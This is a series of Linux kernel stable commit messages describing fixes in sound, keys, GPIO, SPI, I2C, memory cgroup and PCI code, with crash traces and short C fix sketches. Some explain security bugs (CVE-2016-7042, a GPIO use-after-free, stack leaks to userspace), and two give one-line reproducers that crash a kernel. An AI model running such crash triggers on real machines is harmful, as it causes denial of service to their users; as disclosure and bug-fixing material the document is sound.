Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f771d5bb71 upstream.
We have a new Dell laptop model which uses ALC295; its pin definition
differs from the existing ones in the pin quirk table. To fix the
headset mic detection and mic mute LED problems, we need to add the
new pin definition to the pin quirk table.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3ab7511eaf upstream.
Commit 49d9e77e72 ("ALSA: hda - Fix system panic when DMA > 40 bits
for Nvidia audio controllers") simply disabled any DMA exceeding 32
bits for NVidia devices, even though they are capable of performing
DMA up to 40 bits. On some architectures (such as arm64), system memory
is not guaranteed to be 32-bit addressable by PCI devices, and so this
change prevents NVidia devices from working on platforms such as AMD
Seattle.
Since the original commit already mentioned that up to 40 bits of DMA
is supported, and given that the code has been updated in the meantime
to support a 40 bit DMA mask on other devices, revert commit 49d9e77e72
and explicitly set the DMA mask to 40 bits for NVidia devices.
Fixes: 49d9e77e72 ('ALSA: hda - Fix system panic when DMA > 40 bits...')
Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9b50898ad9 upstream.
The recent rewrite of the sequencer time accounting using timespec64
in the commit [3915bf2946: ALSA: seq_timer: use monotonic times
internally] introduced a bad regression. Namely, the time reported
back doesn't increase but goes back and forth.
The culprit was obvious: the delta is stored to the result (cur_time =
delta), instead of adding the delta (cur_time += delta)!
Let's fix it.
Fixes: 3915bf2946 ('ALSA: seq_timer: use monotonic times internally')
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=177571
Reported-by: Yves Guillemot <yc.guillemot@wanadoo.fr>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 52e73eb287 upstream.
We need to wait until the percpu_ref is released before exit. Otherwise,
we sometimes lose the race and trigger this new warning that was added
in v4.9 (commit a67823c1ed "percpu-refcount: init ->confirm_switch
member properly"):
WARNING: CPU: 0 PID: 3629 at lib/percpu-refcount.c:107 percpu_ref_exit+0x51/0x60
[..]
Call Trace:
[<ffffffff814bf093>] dump_stack+0x85/0xc2
[<ffffffff810b15db>] __warn+0xcb/0xf0
[<ffffffff810b170d>] warn_slowpath_null+0x1d/0x20
[<ffffffff814d70c1>] percpu_ref_exit+0x51/0x60
[<ffffffffa005706a>] dax_pmem_percpu_exit+0x1a/0x50 [dax_pmem]
[<ffffffff81615f1f>] devm_action_release+0xf/0x20
Fixes: ab68f26221 ("/dev/dax, pmem: direct access to persistent memory")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 31e6ec4519 upstream.
Since BIG_KEYS can't be compiled as a module, it requires one of the "stdrng"
providers to be compiled into the kernel. Otherwise big_key_crypto_init() fails
on crypto_alloc_rng step and next dereference of big_key_skcipher (e.g. in
big_key_preparse()) results in a NULL pointer dereference.
Fixes: 13100a72f4 ('Security: Keys: Big keys stored encrypted')
Signed-off-by: Artem Savkov <asavkov@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Stephan Mueller <smueller@chronox.de>
cc: Kirill Marinushkin <k.marinushkin@gmail.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7df3e59c3d upstream.
big_key has two separate initialisation functions, one that registers the
key type and one that registers the crypto. If the key type fails to
register, there's no problem if the crypto registers successfully because
there's no way to reach the crypto except through the key type.
However, if the key type registers successfully but the crypto does not,
big_key_rng and big_key_blkcipher may end up set to NULL - but the code
neither checks for this nor unregisters the big key key type.
Furthermore, since the key type is registered before the crypto, it is
theoretically possible for the kernel to try adding a big_key before the
crypto is set up, leading to the same effect.
Fix this by merging big_key_crypto_init() and big_key_init() and calling
the resulting function late. If they're going to be encrypted, we
shouldn't be creating big_keys before we have the facilities to do the
encryption available. The key type registration is also moved after the
crypto initialisation.
The fix also includes message printing on failure.
If the big_key type isn't correctly set up, simply doing:
dd if=/dev/zero bs=4096 count=1 | keyctl padd big_key a @s
ought to cause an oops.
Fixes: 13100a72f4 ('Security: Keys: Big keys stored encrypted')
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Peter Hlavaty <zer0mem@yahoo.com>
cc: Kirill Marinushkin <k.marinushkin@gmail.com>
cc: Artem Savkov <asavkov@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 03dab869b7 upstream.
This fixes CVE-2016-7042.
Fix a short sprintf buffer in proc_keys_show(). If the gcc stack protector
is turned on, this can cause a panic due to stack corruption.
The problem is that xbuf[] is not big enough to hold a 64-bit timeout
rendered as weeks:
(gdb) p 0xffffffffffffffffULL/(60*60*24*7)
$2 = 30500568904943
That's 14 chars plus NUL, not 11 chars plus NUL.
Expand the buffer to 16 chars.
I think the unpatched code apparently works if the stack-protector is not
enabled because on a 32-bit machine the buffer won't be overflowed and on a
64-bit machine there's a 64-bit aligned pointer at one side and an int that
isn't checked again on the other side.
The panic incurred looks something like:
Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ffffffff81352ebe
CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f
ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6
ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679
Call Trace:
[<ffffffff813d941f>] dump_stack+0x63/0x84
[<ffffffff811b2cb6>] panic+0xde/0x22a
[<ffffffff81352ebe>] ? proc_keys_show+0x3ce/0x3d0
[<ffffffff8109f7f9>] __stack_chk_fail+0x19/0x30
[<ffffffff81352ebe>] proc_keys_show+0x3ce/0x3d0
[<ffffffff81350410>] ? key_validate+0x50/0x50
[<ffffffff8134db30>] ? key_default_cmp+0x20/0x20
[<ffffffff8126b31c>] seq_read+0x2cc/0x390
[<ffffffff812b6b12>] proc_reg_read+0x42/0x70
[<ffffffff81244fc7>] __vfs_read+0x37/0x150
[<ffffffff81357020>] ? security_file_permission+0xa0/0xc0
[<ffffffff81246156>] vfs_read+0x96/0x130
[<ffffffff81247635>] SyS_read+0x55/0xc0
[<ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4
Reported-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Tested-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3105f234e0 upstream.
Initial logic for checking CPU match resulted in OR of CPU features
rather than the intended AND.
Updated to use boot_cpu_has macro rather than x86_match_cpu.
In addition, MWAIT is the only required CPU feature for idle
injection to work. Drop other feature requirements since they are
only needed for optimal efficiency.
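A minimal sketch of the check, assuming the standard boot_cpu_has() macro:
	if (!boot_cpu_has(X86_FEATURE_MWAIT)) {
		pr_err("CPU does not support MWAIT\n");
		return -ENODEV;
	}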
Signed-off-by: Eric Ernst <eric.ernst@linux.intel.com>
Acked-by: Jacob Pan <jacob.jun.pan@linux.intel.com>
Signed-off-by: Zhang Rui <rui.zhang@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 89a2848381 upstream.
On 4.0, we saw a stack corruption from a page fault entering direct
memory cgroup reclaim, calling into btrfs_releasepage(), which then
tried to allocate an extent and recursed back into a kmem charge ad
nauseam:
[...]
btrfs_releasepage+0x2c/0x30
try_to_release_page+0x32/0x50
shrink_page_list+0x6da/0x7a0
shrink_inactive_list+0x1e5/0x510
shrink_lruvec+0x605/0x7f0
shrink_zone+0xee/0x320
do_try_to_free_pages+0x174/0x440
try_to_free_mem_cgroup_pages+0xa7/0x130
try_charge+0x17b/0x830
memcg_charge_kmem+0x40/0x80
new_slab+0x2d9/0x5a0
__slab_alloc+0x2fd/0x44f
kmem_cache_alloc+0x193/0x1e0
alloc_extent_state+0x21/0xc0
__clear_extent_bit+0x2b5/0x400
try_release_extent_mapping+0x1a3/0x220
__btrfs_releasepage+0x31/0x70
btrfs_releasepage+0x2c/0x30
try_to_release_page+0x32/0x50
shrink_page_list+0x6da/0x7a0
shrink_inactive_list+0x1e5/0x510
shrink_lruvec+0x605/0x7f0
shrink_zone+0xee/0x320
do_try_to_free_pages+0x174/0x440
try_to_free_mem_cgroup_pages+0xa7/0x130
try_charge+0x17b/0x830
mem_cgroup_try_charge+0x65/0x1c0
handle_mm_fault+0x117f/0x1510
__do_page_fault+0x177/0x420
do_page_fault+0xc/0x10
page_fault+0x22/0x30
On later kernels, kmem charging is opt-in rather than opt-out, and that
particular kmem allocation in btrfs_releasepage() is no longer being
charged and won't recurse and overrun the stack anymore.
But it's not impossible for an accounted allocation to happen from the
memcg direct reclaim context, and we needed to reproduce this crash many
times before we even got a useful stack trace out of it.
Like other direct reclaimers, mark tasks in memcg reclaim PF_MEMALLOC to
avoid recursing into any other form of direct reclaim. Then let
recursive charges from PF_MEMALLOC contexts bypass the cgroup limit.
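A minimal sketch of the PF_MEMALLOC half of that, as seen from
try_to_free_mem_cgroup_pages() (locals approximate):
	current->flags |= PF_MEMALLOC;
	nr_reclaimed = do_try_to_free_pages(zonelist, &sc);
	current->flags &= ~PF_MEMALLOC;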
Link: http://lkml.kernel.org/r/20161025141050.GA13019@cmpxchg.org
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Acked-by: Michal Hocko <mhocko@suse.com>
Cc: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Tejun Heo <tj@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1bc11d70b5 upstream.
As described in https://bugzilla.kernel.org/show_bug.cgi?id=177821:
After some analysis it seems to be that the problem is in alloc_super().
In case list_lru_init_memcg() fails it goes into destroy_super(), which
calls list_lru_destroy().
And in list_lru_init() we see that in case memcg_init_list_lru() fails,
lru->node is freed, but not set NULL, which then leads list_lru_destroy()
to believe it is initialized and call memcg_destroy_list_lru().
memcg_destroy_list_lru() in turn can access lru->node[i].memcg_lrus,
which is NULL.
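A minimal sketch of the fix in list_lru_init() (the error label is
illustrative):
	err = memcg_init_list_lru(lru, memcg_aware);
	if (err) {
		kfree(lru->node);
		/* so a later list_lru_destroy() sees the lru as uninitialized */
		lru->node = NULL;
		goto out;
	}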
[akpm@linux-foundation.org: add comment]
Signed-off-by: Alexander Polakov <apolyakov@beget.ru>
Acked-by: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 58d7896785 upstream.
The function xfs_calc_dquots_per_chunk takes a parameter in units
of basic blocks. The kernel seems to get the units wrong, but
userspace got 'fixed' by commenting out the unnecessary conversion.
Fix both.
Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Reviewed-by: Eric Sandeen <sandeen@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 953b956a2e upstream.
When allocating a new line handle or event, a file is allocated and
associated with it. The file is attached to a file descriptor of the current
process and the file descriptor is returned to userspace using
copy_to_user(). If this copy operation fails the line handle or event
allocation is aborted, all acquired resources are freed and an error is
returned.
But the file struct is not freed and is left attached to the userspace
application, and even though the file descriptor number was not copied it is
trivial to guess. If a userspace application performs an IOCTL on such a
left-over file descriptor it will trigger a use-after-free, and if the file
descriptor is closed (at the latest when the application exits) a double-free
is triggered.
anon_inode_getfd() performs 3 tasks: allocate a file struct, allocate a
file descriptor for the current process, and install the file struct in the
file descriptor. As soon as the file struct is installed in the file
descriptor it is accessible by userspace (even if the IOCTL itself hasn't
completed yet). This means uninstalling the fd on the error path is not an
option, since userspace might already have gotten a reference to the file.
Instead anon_inode_getfd() needs to be broken into its individual steps.
The allocation of the file struct and file descriptor is done first, then
the copy_to_user() is executed and only if it succeeds the file is
installed.
Since the file struct is reference counted it can not be just freed, but
its reference needs to be dropped, which will also call the release()
callback, which will free the state attached to the file. So in this case
the normal error cleanup path should not be taken.
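A minimal sketch of the split-up sequence for the lineevent case (labels and
some names are illustrative, not the literal patch):
	fd = get_unused_fd_flags(O_RDONLY | O_CLOEXEC);
	if (fd < 0) {
		ret = fd;
		goto out_free_le;
	}

	file = anon_inode_getfile("gpio-event", &lineevent_fileops, le,
				  O_RDONLY | O_CLOEXEC);
	if (IS_ERR(file)) {
		ret = PTR_ERR(file);
		goto out_put_unused_fd;
	}

	eventreq.fd = fd;
	if (copy_to_user(ip, &eventreq, sizeof(eventreq))) {
		fput(file);		/* triggers release(), which frees le */
		put_unused_fd(fd);
		return -EFAULT;
	}

	fd_install(fd, file);	/* only now is the fd visible to userspace */
	return 0;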
Fixes: d932cd4918 ("gpio: free handles in fringe cases")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d82aa4a8f2 upstream.
The GPIOHANDLE_GET_LINE_VALUES_IOCTL handler allocates a gpiohandle_data
struct on the stack and then passes it to copy_to_user(). But only the
first element of the values array in the struct is set, which leaves the
struct partially initialized.
This exposes the previous, potentially sensitive, stack content to the
issuing userspace application. To avoid this make sure that the struct is
fully initialized.
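A minimal sketch of the fix (surrounding names approximate):
	struct gpiohandle_data ghd;

	memset(&ghd, 0, sizeof(ghd));	/* no stale stack bytes reach userspace */
	ghd.values[0] = !!gpiod_get_value_cansleep(le->desc);
	if (copy_to_user(ip, &ghd, sizeof(ghd)))
		return -EFAULT;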
Cc: stable@vger.kernel.org
Fixes: 61f922db72 ("gpio: userspace ABI for reading GPIO line events")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ac7dbb991e upstream.
The GPIO_GET_LINEEVENT_IOCTL currently ignores unknown or undefined
linehandle and lineevent flags. From a backwards and forwards compatibility
viewpoint it is highly desirable to reject unknown flags though.
On one hand an application that is using newer flags and is running on
an older kernel has no way to detect if the new flags were handled
correctly if they are silently discarded.
On the other hand an application that (accidentally) passes undefined flags
will run fine on an older kernel, but may break on a newer kernel when
these flags get defined.
Ensure that requests that have undefined flags set are rejected with an
error, rather than silently discarding the undefined flags.
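A minimal sketch of the check; the *_VALID_FLAGS masks are illustrative helper
macros covering every currently defined flag:
	if ((lflags & ~GPIOHANDLE_REQUEST_VALID_FLAGS) ||
	    (eflags & ~GPIOEVENT_REQUEST_VALID_FLAGS))
		return -EINVAL;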
Fixes: 61f922db72 ("gpio: userspace ABI for reading GPIO line events")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3e847c7f1 upstream.
The GPIO_GET_LINEHANDLE_IOCTL currently ignores unknown or undefined
linehandle flags. From a backwards and forwards compatibility viewpoint it
is highly desirable to reject unknown flags though.
On one hand an application that is using newer flags and is running on
an older kernel has no way to detect if the new flags were handled
correctly if they are silently discarded.
On the other hand an application that (accidentally) passes undefined flags
will run fine on an older kernel, but may break on a newer kernel when
these flags get defined.
Ensure that requests that have undefined flags set are rejected with an
error, rather than silently discarding the undefined flags.
Fixes: d7c51b47ac ("gpio: userspace ABI for reading/writing GPIO lines")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b8b0e3d303 upstream.
The line offset that is used as an index into the descs array is provided
by userspace and might go beyond the bounds of the array. If that happens
undefined behavior will occur.
Make sure that the offset is within the bounds of the desc array and reject
any requests that specify a value outside of it.
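A minimal sketch of the bounds check (field names as in the GPIO uAPI and
gpiolib):
	if (eventreq.lineoffset >= gdev->ngpio)
		return -EINVAL;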
Fixes: 61f922db72 ("gpio: userspace ABI for reading GPIO line events")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3eded5d83b upstream.
The GPIOHANDLE_GET_LINE_VALUES_IOCTL handler allocates a gpiohandle_data
struct on the stack and then passes it to copy_to_user(). But depending on
the number of requested line handles the struct is only partially
initialized.
This exposes the previous, potentially sensitive, stack content to the
issuing userspace application. To avoid this make sure that the struct is
fully initialized.
Fixes: d7c51b47ac ("gpio: userspace ABI for reading/writing GPIO lines")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e405f9fcb6 upstream.
The line offset that is used as an index into the descs array is provided
by userspace and might go beyond the bounds of the array. If that happens
undefined behavior will occur.
Make sure that the offset is within the bounds of the desc array and reject
any requests that specify a value outside of it.
Fixes: d7c51b47ac ("gpio: userspace ABI for reading/writing GPIO lines")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0f4bbb2337 upstream.
The GPIO_GET_CHIPINFO_IOCTL handler allocates a gpiochip_info struct on the
stack and then passes it to copy_to_user(). But depending on the length of
the GPIO chip name and label the struct is only partially initialized.
This exposes the previous, potentially sensitive, stack content to the
issuing userspace application. To avoid this make sure that the struct is
fully initialized.
Fixes: 521a2ad6f8 ("gpio: add userspace ABI for GPIO line information")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1f1cc4566b upstream.
The current line offset validation is off by one. Depending on the data
stored behind the descs array this can either cause undefined behavior or
disclose arbitrary, potentially sensitive, memory to the issuing userspace
application.
Make sure that offset is within the bounds of the desc array.
Fixes: 521a2ad6f8 ("gpio: add userspace ABI for GPIO line information")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 67bf5156ed upstream.
acpi_dev_gpio_irq_get() currently ignores the error returned
by acpi_get_gpiod_by_index() and overwrites it with -ENOENT.
Problem is this error can be -EPROBE_DEFER, which just blows
up some drivers when the module ordering is not correct.
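In sketch form only (the real function iterates over indexes; this just shows
the idea of keeping the original error):
	desc = acpi_get_gpiod_by_index(adev, NULL, index, &info);
	if (IS_ERR(desc))
		return PTR_ERR(desc);	/* e.g. -EPROBE_DEFER, not -ENOENT */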
Signed-off-by: David Arcari <darcari@redhat.com>
Signed-off-by: Benjamin Tissoires <benjamin.tissoires@redhat.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0af98a7e0 upstream.
Instantiated SPI device nodes are marked with OF_POPULATE. This was
introduced in bd6c164. On unloading, loaded device nodes will of course
be unmarked. The problem are nodes that fail during initialisation: If a
node fails, it won't be unloaded and hence not be unmarked.
If a SPI driver module is unloaded and reloaded, it will skip nodes that
failed before.
Skip device nodes that are already populated and mark them only in case
of success.
Note that the same issue exists for I2C.
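A sketch of the resulting loop, close to the spi core of this era
(of_register_spi_device() is that file's internal helper):
	for_each_available_child_of_node(master->dev.of_node, nc) {
		if (of_node_test_and_set_flag(nc, OF_POPULATED))
			continue;	/* already instantiated earlier */
		spi = of_register_spi_device(master, nc);
		if (IS_ERR(spi)) {
			dev_warn(&master->dev,
				 "Failed to create SPI device for %s\n",
				 nc->full_name);
			of_node_clear_flag(nc, OF_POPULATED);	/* allow retry */
		}
	}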
Fixes: bd6c164 ("spi: Mark instantiated device nodes with OF_POPULATE")
Signed-off-by: Ralf Ramsauer <ralf@ramses-pyramidenbau.de>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Acked-by: Pantelis Antoniou <pantelis.antoniou@konsulko.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5c0ba57744 upstream.
When we get a spurious interrupt in fsl_espi_irq, we end up
processing four uninitialized bytes of data, as shown in this
warning message:
drivers/spi/spi-fsl-espi.c: In function 'fsl_espi_irq':
drivers/spi/spi-fsl-espi.c:462:4: warning: 'rx_data' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds another check so we skip the data in this case.
Fixes: 6319a68011 ("spi/fsl-espi: avoid infinite loops on fsl_espi_cpu_irq()")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 36e3fa6a38 upstream.
The i2c adapter is only relevant for some peer device types, so
let's clear the pdt if it's still the same as the old_pdt when we
tear down the i2c adapter.
I don't really like this design pattern of updating port->whatever
before doing the accompanying changes and passing around old_whatever
to figure stuff out. Would make much more sense to me to the pass the
new value around and only update the port->whatever when things are
consistent. But let's try to work with what we have right now.
Quoting a follow-up from Ville:
"And naturally I forgot to amend the commit message w.r.t. this guy
[the change in drm_dp_destroy_port]. We don't really need to do this
here, but I figured I'd try to be a bit more consistent by having it,
just to avoid accidental mistakes if/when someone changes this stuff
again later."
v2: Clear port->pdt in the caller, if needed (Daniel)
Cc: Daniel Vetter <daniel@ffwll.ch>
Cc: Carlos Santa <carlos.santa@intel.com>
Cc: Kirill A. Shutemov <kirill@shutemov.name>
Tested-by: Carlos Santa <carlos.santa@intel.com>
Tested-by: Kirill A. Shutemov <kirill@shutemov.name>
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97666
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/1477488633-16544-1-git-send-email-ville.syrjala@linux.intel.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 147b36d5b7 upstream.
Race condition between registering an I2C device driver and
deregistering an I2C adapter device which is assumed to manage that
I2C device may lead to a NULL pointer dereference due to the
uninitialized list head of driver clients.
The root cause of the issue is that the I2C bus may know about the
registered device driver and thus it is matched by bus_for_each_drv(),
but the list of clients is not initialized and commonly it is NULL,
because I2C device drivers define struct i2c_driver as static and
clients field is expected to be initialized by I2C core:
  i2c_register_driver()                 i2c_del_adapter()
    driver_register()                     ...
      bus_add_driver()                    ...
        ...                               bus_for_each_drv(..., __process_removed_adapter)
      ...                                   i2c_do_del_adapter()
    ...                                       list_for_each_entry_safe(..., &driver->clients, ...)
    INIT_LIST_HEAD(&driver->clients);
To solve the problem it is sufficient to do clients list head
initialization before calling driver_register().
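A minimal sketch of the resulting order in i2c_register_driver() (not the full
function):
	INIT_LIST_HEAD(&driver->clients);	/* before we become visible */

	res = driver_register(&driver->driver);
	if (res)
		return res;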
The problem was found while using an I2C device driver with a sluggish
registration routine on a bus provided by a physically detachable I2C
master controller, but practically the oops may be reproduced under
the race between arbitrary I2C device driver registration and managing
I2C bus device removal e.g. by unbinding the latter over sysfs:
% echo 21a4000.i2c > /sys/bus/platform/drivers/imx-i2c/unbind
Unable to handle kernel NULL pointer dereference at virtual address 00000000
Internal error: Oops: 17 [#1] SMP ARM
CPU: 2 PID: 533 Comm: sh Not tainted 4.9.0-rc3+ #61
Hardware name: Freescale i.MX6 Quad/DualLite (Device Tree)
task: e5ada400 task.stack: e4936000
PC is at i2c_do_del_adapter+0x20/0xcc
LR is at __process_removed_adapter+0x14/0x1c
Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment none
Control: 10c5387d Table: 35bd004a DAC: 00000051
Process sh (pid: 533, stack limit = 0xe4936210)
Stack: (0xe4937d28 to 0xe4938000)
Backtrace:
[<c0667be0>] (i2c_do_del_adapter) from [<c0667cc0>] (__process_removed_adapter+0x14/0x1c)
[<c0667cac>] (__process_removed_adapter) from [<c0516998>] (bus_for_each_drv+0x6c/0xa0)
[<c051692c>] (bus_for_each_drv) from [<c06685ec>] (i2c_del_adapter+0xbc/0x284)
[<c0668530>] (i2c_del_adapter) from [<bf0110ec>] (i2c_imx_remove+0x44/0x164 [i2c_imx])
[<bf0110a8>] (i2c_imx_remove [i2c_imx]) from [<c051a838>] (platform_drv_remove+0x2c/0x44)
[<c051a80c>] (platform_drv_remove) from [<c05183d8>] (__device_release_driver+0x90/0x12c)
[<c0518348>] (__device_release_driver) from [<c051849c>] (device_release_driver+0x28/0x34)
[<c0518474>] (device_release_driver) from [<c0517150>] (unbind_store+0x80/0x104)
[<c05170d0>] (unbind_store) from [<c0516520>] (drv_attr_store+0x28/0x34)
[<c05164f8>] (drv_attr_store) from [<c0298acc>] (sysfs_kf_write+0x50/0x54)
[<c0298a7c>] (sysfs_kf_write) from [<c029801c>] (kernfs_fop_write+0x100/0x214)
[<c0297f1c>] (kernfs_fop_write) from [<c0220130>] (__vfs_write+0x34/0x120)
[<c02200fc>] (__vfs_write) from [<c0221088>] (vfs_write+0xa8/0x170)
[<c0220fe0>] (vfs_write) from [<c0221e74>] (SyS_write+0x4c/0xa8)
[<c0221e28>] (SyS_write) from [<c0108a20>] (ret_fast_syscall+0x0/0x1c)
Signed-off-by: Vladimir Zapolskiy <vladimir_zapolskiy@mentor.com>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 399c168ab5 upstream.
We found a bug where an i2c transfer sometimes failed on a 3066a board with
stable-4.8: the con register would be updated with an uninitialized tuning
value, which made the i2c transfer fail.
So set the tuning value to zero during rk3x_i2c_v0_calc_timings.
Signed-off-by: David Wu <david.wu@rock-chips.com>
Tested-by: Andy Yan <andy.yan@rock-chips.com>
Reviewed-by: Douglas Anderson <dianders@chromium.org>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e046114af5 upstream.
nvdimm_clear_poison cleared the user-visible badblocks, and sent
commands to the NVDIMM to clear the areas marked as 'poison', but it
neglected to clear the same areas from the internal poison_list which is
used to marshal ARS results before sorting them by namespace. As a
result, once on-demand ARS functionality was added:
37b137f nfit, libnvdimm: allow an ARS scrub to be triggered on demand
A scrub triggered from either sysfs or an MCE was found to be adding
stale entries that had been cleared from gendisk->badblocks, but were
still present in nvdimm_bus->poison_list. Additionally, the stale entries
could be triggered into producing stale disk->badblocks by simply disabling
and re-enabling the namespace or region.
This adds the missing step of clearing poison_list entries when clearing
poison, so that it is always in sync with badblocks.
Fixes: 37b137f ("nfit, libnvdimm: allow an ARS scrub to be triggered on demand")
Signed-off-by: Vishal Verma <vishal.l.verma@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 13f392ebc3 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridges memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI tegra host bridge driver adds the PCI IO resource retrieved from
firmware to the host bridge resource windows even if the
pci_remap_iospace() call fails; this is an actual bug in that the PCI host
bridge would consider the PCI IO resource valid (and possibly assign it to
downstream devices) even if the kernel was not able to map the PCI host
bridge memory address driving IO cycles to the CPU virtual address space
(i.e. pci_remap_iospace() failures).
Add the PCI host bridge driver pci_remap_iospace() failure path and do not
add the corresponding PCI host bridge PCI IO resources retrieved through
firmware when the pci_remap_iospace() function call fails, fixing the
issue.
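The shape of the failure path, common to this fix and the designware, versatile, generic, aardvark and rcar fixes that follow (a sketch; the resource, list and offset names are illustrative, not the exact tegra code):

    err = pci_remap_iospace(&pcie->pio, pcie->io.start);
    if (err) {
        dev_warn(dev, "error %d: failed to map IO window %pR\n",
                 err, &pcie->pio);
        /* do NOT add the IO window to the host bridge resources */
    } else {
        pci_add_resource_offset(windows, &pcie->pio, io_offset);
    }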
Fixes: e6e9f471f5 ("PCI: tegra: Use generic pci_remap_iospace() rather than ARM32-specific one")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
